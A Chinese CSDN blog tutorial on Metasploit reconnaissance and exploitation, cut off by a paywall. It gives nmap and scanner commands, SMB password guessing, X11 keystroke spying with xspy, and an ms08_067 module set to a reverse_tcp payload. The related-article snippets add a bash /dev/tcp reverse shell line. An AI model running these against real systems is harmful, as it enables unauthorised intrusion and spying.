如何黑掉一个宇宙?一文带你详解Meterpreter后渗透模块攻击(文末赠送免费资源哦~)

最新推荐文章于 2024-01-26 15:41:32 发布
最新推荐文章于 2024-01-26 15:41:32 发布
阅读量1.9k 收藏 5
点赞数 2
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46238756/article/details/109439009
版权

如何黑掉一个宇宙?一文带你详解Meterpreter后渗透模块攻击(文末赠送免费资源哦~)

文末赠送超级干货哈
一.名词解释
exploit
测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的
有内存溢出,网站程序漏洞利用,配置错误exploit。
payload
我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立一
个反响连接,bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是只
能在目标机器上执行有限命令的程序。
shellcode
是进行攻击时的一系列被当作payload 的指令,通常在目标机器上执行之后提供一个可
执行命令的shell。
module
MSF 的模块,由一系列代码组成。
listener
等待来自被攻击机器的incoming 连接的监听在测试者机器上的程序

二. 编码器
msfencode –l 查看可用的编码器(encoders),效果最佳的是x86/shikata_ga_nai

三.信息刺探与收集
1、攻击第一步:基础信息收集
①whois 查询:
msf > whois example.com
msf> whois 192.168.1.100

②在线手机服务器IP工具

③nslookup
set type=mx
example.com

2、用nmap 探测开放端口和服务:

-sS SYN 半开扫描
-sT TCP 半开扫描
-Pn 不使用ping方式探测主机
-A 探测服务类型
-6 开启IPV6 扫描
-O 探测操作系统版本

常用扫描参数组合:
nmap –sS –Pn 192.168.0.111
nmap –sS –Pn –A 192.168.0.111

3、MSF 与postgresql 协同工作
/etc/init.d/postgreql-8.3 start
msf> db_connect postgres:toor@127.0.0.1/msf
msf> db_status
导入nmap 扫描的结果:
nmap –sS –Pn –A –oX Subnet1 192.168.1.0/24 # -oX 扫描结果导出为Subnet1.xml
msf> db_import Subnet1.xml
msf> db_hosts –c address #查看导入的主机IP
(msf 也可以和mysql 一起工作,在bt5 r1 中msf 默认支持连接mysql:
msf> db_driver mysql
msf> db_connect root:toor@127.0.0.1/msf3 #连接本机mysql 的msf3 数据库
mysql 默认密码toor,使用db_connect 连接时会自动创建msf3 库)

4、高级扫描方式:
①msf> use auxiliary/scanner/ip/ipidseq #IPID 序列扫描器,与nmap 的-sI -O 选项类似
show options
set RHOSTS 192.168.1.0/24
set RPORT 8080
set THREADS 50
run
(RHOSTS、RPORT 等参数也可以用小写)
②msf> nmap –PN –sI 192.168.1.09 192.168.1.155
③nmap 连接数据库:
msf> db_connect postgres:toor@127.0.0.1/msf
msf> db_nmap –sS –A 192.168.1.111
msf> db_services #查看扫描结果
④使用portscan 模块:
msf> search postscan
msf> use scanner/postscan/syn
set RHOSTS 192.168.1.111
set THREADS 50
run

5、特定扫描:
smb_version 模块:
msf> use auxiliary/scanner/smb/smb_version
show options
set RHOSTS 192.168.1.111
run
db_hosts –c address,os_flavor
查找mssql 主机:
msf> use auxiliary/scanner/mssql/mssql_ping
show options
set RHOSTS 192.168.1.0/24
set THREADS 255
run
SSH 服务器扫描:
msf> use auxiliary/scanner/ssh/ssh_version
set THREADS 50
run
FTP 主机扫描:
msf> use auxiliary/scanner/ftp/ftp_version
show options
set RHOSTS 192.168.1.0/24
set THREADS 255
run
扫描FTP 匿名登录:
use auxiliary/scanner/ftp/anonymos
set RHOSTS 192.168.1.0/24
set THREADS 50
run
扫描SNMP 主机:
msf> use auxiliary/scanner/snmp/snmp_login
set RHOSTS 192.168.1.0/24
set THREADS 50
run

四.基本漏洞扫描
1、使用nc 与目标端口通信,获取目标端口的信息:
nc 192.168.1.111 80
GET HTTP 1/1
Server: Microsoft-IIS/5.1
(1:还有一个功能与nc 类似的工具Ncat,产自nmap 社区,可实现相同功能:
ncat -C 192.168.1.111 80
GET / HTTP/1.0

2:题外:ncat 还可以做聊天服务器呢!在服务器端监听然后多个客户端直接连上就
可以聊天了:服务器(chatserver):ncatncat -l –chat 其他客户端:ncat chatserver

3:ncat 还可以用来查看各种客户端的请求信息,比如论坛里有人问中国菜刀有木有后门,那么可以这样查看中国菜刀连接后门时发送的数据:
服务器(server.example.com)上:ncat -l –keep-open 80 –output caidao.log > /dev/null
然后使用菜刀连接http://server.example.com/nc.php 并请求操作,这是菜刀发送的数据就保存到服务器的caidao.log 里面了。也可以导出为hex 格式,–output 换为–hex-dump就可以了。

4:其实与nc 功能类似的工具在bt5 里面还有很多,比如还有一个sbd:
监听:sbd -l -p 12345
连接:sbd 192.168.1.111 12345

5:当然也可以用来聊天,与ncat 的不同之处在于ncat 自动对用户编号user1、user2、…,
而sbd 可以自定义昵称,且不需要专门单独监听为聊天服务器:
pc1:sbd -l -p 12345 -P chowner
pc2:sbd pc1 12345 -P evil

6:其实nc 也可以用来聊天的:
pc1:nc -l -p 12345
pc2:telnet pc1 12345)

3、与nessus 结合扫描:
使用Nessus 扫描完成后生成.nessus 格式的报告,导入到MSF:
db_connect postgres:toor@127.0.0.1/msf
db_import /tmp/nessus_report_Host_test.nessus
db_hosts –c address,svcs,vulns
db_vulns
在MSF 中使用Nessus:
db_connect postgres:toor@127.0.0.1/msf
load nessus
nessus_connect nessus:toor@192.168.1.111:8834 ok
nessus_policy_list #查看存在的扫描规则
nessus_scan_new 2 bridge_scan 192.168.1.111 #2 表示规则的ID 号,bridge_scan 自定义扫描名称
nessus_scan_status #查看扫描进行状态
nessus_report_list #查看扫描结果
nessus_report_get skjla243-3b5d-* #导入报告
db_hosts –c address,svcs,vulns

4、特殊扫描:
SMB 弱口令:
msf> use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.1.111-222
set SMBUser Administrator
set SMBPass admin
run
VNC 空口令:
msf> use auxiliary/scanner/vnc/vnc_none_auth
set RHOSTS 192.168.1.111
run
Open X11 空口令:
msf> use auxiliary/scanner/x11/open_x11
set RHOST 192.168.1.0/24
set THREADS 50
run
当扫描到此漏洞的主机后可以使用xspy 工具来监视对方的键盘输入:
cd /pentest/sniffers/xspy/
./xspy –display 192.168.1.125:0 –delay 100
(xspy 这货在bt5 r1 里面貌似木有了)

五.基础溢出命令
1、基本命令:
查看可用溢出模块show exploits
查看辅助模块show auxiliary 包括扫描器,拒绝服务模块,fuzzer 工具或其他。
查看可用选项show options
加载模块后退出此模块back
例子:
msf> use windows/smb/ms08_067_netapi
back
搜索模块search
例子: searh mssql search ms08_067
查看当前模块可用的payload: show payloads
例子:
use windows/smb/ms08_067_netapi
show payloads
set payload windows/shell/reverse_tcp
show options
查看可选的目标类型show targets
查看更多信息info
设置一个选项或取消设置set/unset
设置或取消全局选项setg/unsetg 例如设置LHOST 就可以用setg,避免后面重复设置
保存全局选项的设置save 当下次启动仍然生效
查看建立的session sess

最低0.47元/天 解锁文章
天策安全技术联盟
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Meterpreter渗透模块命令字典
m0_57221101的博客
04-14 728
一.系统命令 1.快捷操作 此板块用于记录用于操作meterpreter的指令 sessions #查看全部会话 –h 查看帮助 sessions -i <shell ID> #进入会话 -k 杀死会话 background #将当前会话放置后台 run #执行已有的模块,输入run后按两下tab,列出已有的脚本 info #查看已有模块信息 2.基础系统命令 getuid # 查看权限 getpid # 获取当前进程的pid sysinfo # 查看目标机系
meterpreter后期攻击使用方法
csdncsdnq的博客
11-26 829
meterpreter后期攻击使用方法 制作木马pcshare,远控软件,网上寻找软件上传到目标主机 1、上传文件到Windows主机   简单来说,就是你可以上传本机的任意文件到远程目标主机中。 meterpreter > upload <file> <destination> meterpreter > upload //root//123.exe c://123.exe 注意:使用-r可以递归上传目录和文件 2、在目标主机上强行执行E
漏洞利用二:Meterpreter后期攻击方法使用
ZY95001的博客
09-04 1408
一、shell命令 1、shell (进入靶机cmd) 2、whoami命令:查看当前用户权限。 可知当进行攻击后,入侵者当前权限为最高权限用户system(win权限排名:system>administrator>普通用户) 3、net user命令:显示当前所有用户,本机为system,除此之外还存在下图另三个 4.exit退出当前路径 二、上传文件、执行操作 1.上传本机的任意文件到目标主机中。 在物理机上生成木马文件 打开软件pcshare...
0x2Meterpreter后漏洞利用攻击教程
si1ence的博客
07-28 576
Meterpreter攻击场景一般为先向被攻击系统发送一个攻击载荷(payload),该攻击载荷会反向链接到meterpreter,然后发送一个Meterpeter Server dll紧接着发送第二个dll注入攻击载荷完成一个socket的,这样服务器与客户端的meterpreter会话就生成了。 Meterpreter链接上后具有很多功能如下 基于不同的用途,这里列举这些命令的部分 ...
Istio是啥?一文你彻底了解!
02-24
官方对Istio的介绍浓缩成了一句话:Anopenplatformtoconnect,secure,controlandobserveservices.翻译过来,就是”连接、安全加固、控制和观察服务的开放平台“。开放平台就是指它本身是开源的,服务对应的是微服务,...
LED有多少种封装形式?一文你看遍
01-19
LED 是一类可直接将电能转化为可见光和辐射能的发光器件,具有工作电压低,耗电量小,发光效率高,发光响应时间极短,光色纯,结构牢固,抗冲击,耐振动,性能稳定可靠,重量轻,体积小,成本低等一系列特性,发展...
meterpreter 笔记
Cou1d的博客
12-25 387
**第一章:** ```PETS渗透测试流程``` --前期交互--情报搜集--威胁建模--漏洞分析--渗透攻击--后渗透攻击--测试报告撰写 ```渗透测试类型``` 白盒测试:即和客户一起工作,测试者在拥有客户组织所有知识的情况下进行的渗透测试,问题在于无法有效地测试客户组织的应急响应程序,无法判断他们安全防护计划检测特定攻击的效率。减少了情报搜集阶段。 黑盒测试:模拟对客户组织一无...
Meterpreter使用总结(2)之后渗透攻击模块
CODING...
02-08 1万+
meterpreter虽然功能强大,作为单一的工具还是会有他功能的局限性,因此在metasploit4.0之后引入了后渗透攻击模块,通过在meterpreter中使用ruby编写的模块来进行进一步的渗透攻击。 (1)获取目标机器的分区情况: (2)判断是否为虚拟机: 如果有时候我们渗透测试的时候发现获得的目标机器是一个虚拟机,就要打醒十二分精神了,有可能这个是对方设置的一个蜜罐系统。
【内网安全】——meterpreter使用攻略
最新发布
qq_53058639的博客
01-26 758
Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。
12.1、后渗透测试--提权
无痕的博客
12-13 732
meterpreter渗透阶段提权
Meterpreter命令详解
子曰小玖的博客
08-08 1万+
0x01初识Meterpreter 1.1.什么是Meterpreter MeterpreterMetasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一...
fasttrack的SQLPwnage(失败)
天元喜羊羊的博客
07-11 1005
这次也是失败的,操作如下: root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i Fast-Track Main Menu: 1. Fast-Track Updates 2. Autopwn Automation 3. Nmap Scripting Engine 4. Microsoft SQL
将Common shell 提升为 Meterpreter shell
weixin_46104215的博客
09-21 786
对目标主机攻击获取的不一定是一个meterpreter shell(交互式shell),可能只是一个 common shell 在shell中,先输入Ctrl+z,然后输入y (把shell隐藏到后台,sell 为 session 1) 隐藏 shell 后,此时处于 msf 界面中,可以输入 sessions -l 查看session会话情况 结果显示:session 1 是 cmd/unix(common shell) 想要将 common shell 提升为 meterpret...
反弹Shell升级为交互式Shell ——yzddMr6
yzddMr6的博客
12-03 2489
前言 看hack the box的视频的时候,发现ippsec不喜欢用蚁剑,喜欢弹个shell回来。 然后一顿操作把一个简单的shell就升级到了一个标准交互式shell 写这篇文章记录一下 正文 攻击机:kali 靶机:ubuntu 首先ubuntu建一个新用户:test,密码 test 普通Shell 给kali弹shell bash -i >& /dev/tcp/192.168...
渗透meterpreter学习笔记
迷风小白
11-08 7768
0x00 前言 由于最近想学习关于内网渗透的一些知识,前面也有师傅写了关于meterpreter的使用攻略,我这里就来复现学习一下。 MeterpreterMetasploit框架中的一个扩展模块,作为后渗透阶段的利器,其强大之处可想而知,我这里就简单介绍一下常用命令。 0x01 系统命令 基本系统命令 background # 将当前会话放置后台 sessions # sessions...
nmap常用的扫描命令
weixin_33758863的博客
05-12 780
NMap,也就是Network Mapper,是Linux下的网络扫描和嗅探工具包。 nmap是在网络安全***测试中经常会用到的强大的扫描器。功能之强大,不言而喻。下面介绍一下它的几种扫描命令。具体的还是得靠大家自己学习,因为实在太强大了。 1) 获取远程主机的系统类型及开放端口 nmap -sS -P0 -sV -O <target> 这里的 <...
Meterpreter使用总结(1)
热门推荐
CODING...
02-08 2万+
meterpreter是我最喜欢使用的攻击payload,经常都会使用windows/meterpreter/reverse_tcp作为携的payload来进行测试,下面就meterpreter的基本使用进行一个总结:
Phpstorm2018 永久激活
harry
12-10 7470
原文地址 1、安装phpstorm,安装包请自行官网下载       http://www.jetbrains.com/phpstorm/download/ 2、下载JetbrainsCrack.jar文件,存放至你的phpstorm执行文件同级目录下 https://github.com下载JetbrainsCrack.jar        例如我的执行文件目录为:D:\Program ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值